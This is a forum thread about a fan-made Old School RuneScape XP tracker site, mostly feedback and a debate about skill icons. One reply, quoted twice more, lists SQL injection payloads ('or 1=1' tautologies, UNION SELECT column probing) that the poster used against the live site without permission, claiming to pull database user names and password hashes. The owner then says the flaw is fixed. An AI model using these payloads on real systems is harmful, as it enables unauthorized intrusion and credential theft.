Skip to content
View in the app

A better way to browse. Learn more.

Tip.It Forum

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

OSRS xp tracking website

Featured Replies

  • Author

More appropriate to the OSRS section, so moved :)

thank you for that :)

t5FHqbT.jpgz3PhbtJ.jpg

Looks alright and I wish you the best of luck, but Foot's website (http://crystalmathlabs.com/tracker/) looks to be able to do everything your tracker does and more, so personally I'll stick to using that.

 

It doesn't mean there's no place for your site however; for the EOC I used both Runetrack and Runetracker, but for now your site doesn't have anything really that'll make me want to visit your site over what's already available.

imagangster.png

I like 07tracker

  • Author

Looks alright and I wish you the best of luck, but Foot's website (http://crystalmathlabs.com/tracker/) looks to be able to do everything your tracker does and more, so personally I'll stick to using that.

 

It doesn't mean there's no place for your site however; for the EOC I used both Runetrack and Runetracker, but for now your site doesn't have anything really that'll make me want to visit your site over what's already available.

 

thanks for feedback :)

my site is still in beta. like, im opened for fresh ideas and willing to make them, just name what you want to see, sigs, races, just name it. :)

t5FHqbT.jpgz3PhbtJ.jpg
  • Author

made some small adjustments:

now site has clean urls- http://rs07tracker.com/progress/overall/nex-is-wet/ as it should have in first place.

 

happy to announce, that few players have been asking about forum signatures to embed in forums- first thing i'll do when i have a break from finals.

t5FHqbT.jpgz3PhbtJ.jpg
  • Author

added goals, if someone is interested.

BKwYT0jCcAE90yS.png

t5FHqbT.jpgz3PhbtJ.jpg
  • Author

a friend of mine drawed a design, now it looks awesome!.

t5FHqbT.jpgz3PhbtJ.jpg

On a design note, why does it use the updated live game skill icons? :/

LgEZt.png

  • Author

On a design note, why does it use the updated live game skill icons? :/

 

i didn't liked the old school icons, and they are very small. also they didnt fit in design as good as new ones.

t5FHqbT.jpgz3PhbtJ.jpg

Looking good, but even though I prefer the updated, live game skill icons over the Old School ones, I think that the Old School icons would be better in this case, because it's a tracker for Old School, would make more sense to have graphics from Old School.

  • Author

old ones are in ridiculus resolution, and new icons suits better in whole page.

old ones looks like this-

lgtb7f5.png(29x29 px)

t5FHqbT.jpgz3PhbtJ.jpg

Surely we can get someone to manually fix them?

 

Although it's quite funny that the two current live game trackers use the old school skill icons, while your Old School tracker uses the live game skill icons.

old ones are in ridiculus resolution, and new icons suits better in whole page.

old ones looks like this-

lgtb7f5.png(29x29 px)

tDcMkiK.png

 

The old ones can look nice too.

LgEZt.png

Well, out of some spare time, here is the set of oldshool icons, as a sprite - vertically centred and on a 35px horizontal grid, on transparent background For anyone who ever may have need for them!

 

ifc7V0G.png

 

E: this version is better, a few pixels were on vacation in the last version..

 

E2: Forgot overall. shj0gnl.png

LgEZt.png

Thanks a lot for this. I really learned a lot of SQL injection from using this website.

 

"View your prog" injection:

The following shows all data points in your database in a single choppy graph

alkan' or '1'='1

 

Combines the graph of alkan and leyatis in one!

alkan' or Name='leyatis

 

"Goals" search injection:

Shows all goals in the search list

' or '1'='1

' union select * from goals where '1'='1

 

After the query above, I started doing

' union select all 1,2,'a <FAIL

then

' union select all 1,2,3,'a <FAIL

then

' union select all 1,2,3,4,'a <FAIL

until finally this worked

' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

oh dear..

LgEZt.png

  • Author

Thanks a lot for this. I really learned a lot of SQL injection from using this website.

 

"View your prog" injection:

The following shows all data points in your database in a single choppy graph

alkan' or '1'='1

 

Combines the graph of alkan and leyatis in one!

alkan' or Name='leyatis

 

"Goals" search injection:

Shows all goals in the search list

' or '1'='1

' union select * from goals where '1'='1

 

After the query above, I started doing

' union select all 1,2,'a <FAIL

then

' union select all 1,2,3,'a <FAIL

then

' union select all 1,2,3,4,'a <FAIL

until finally this worked

' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

 

oh sh1t.

thanks man, you helped a lot, i completely forgot to escape mysql strings.

begginners mistakes.

 

fixed now though.

t5FHqbT.jpgz3PhbtJ.jpg

Thanks a lot for this. I really learned a lot of SQL injection from using this website.

 

"View your prog" injection:

The following shows all data points in your database in a single choppy graph

alkan' or '1'='1

 

Combines the graph of alkan and leyatis in one!

alkan' or Name='leyatis

 

"Goals" search injection:

Shows all goals in the search list

' or '1'='1

' union select * from goals where '1'='1

 

After the query above, I started doing

' union select all 1,2,'a <FAIL

then

' union select all 1,2,3,'a <FAIL

then

' union select all 1,2,3,4,'a <FAIL

until finally this worked

' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

 

oh sh1t.

thanks man, you helped a lot, i completely forgot to escape mysql strings.

begginners mistakes.

 

fixed now though.

Not a problem. I had a lot of fun.

Create an account or sign in to comment

Important Information

By using this site, you agree to our Terms of Use.

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.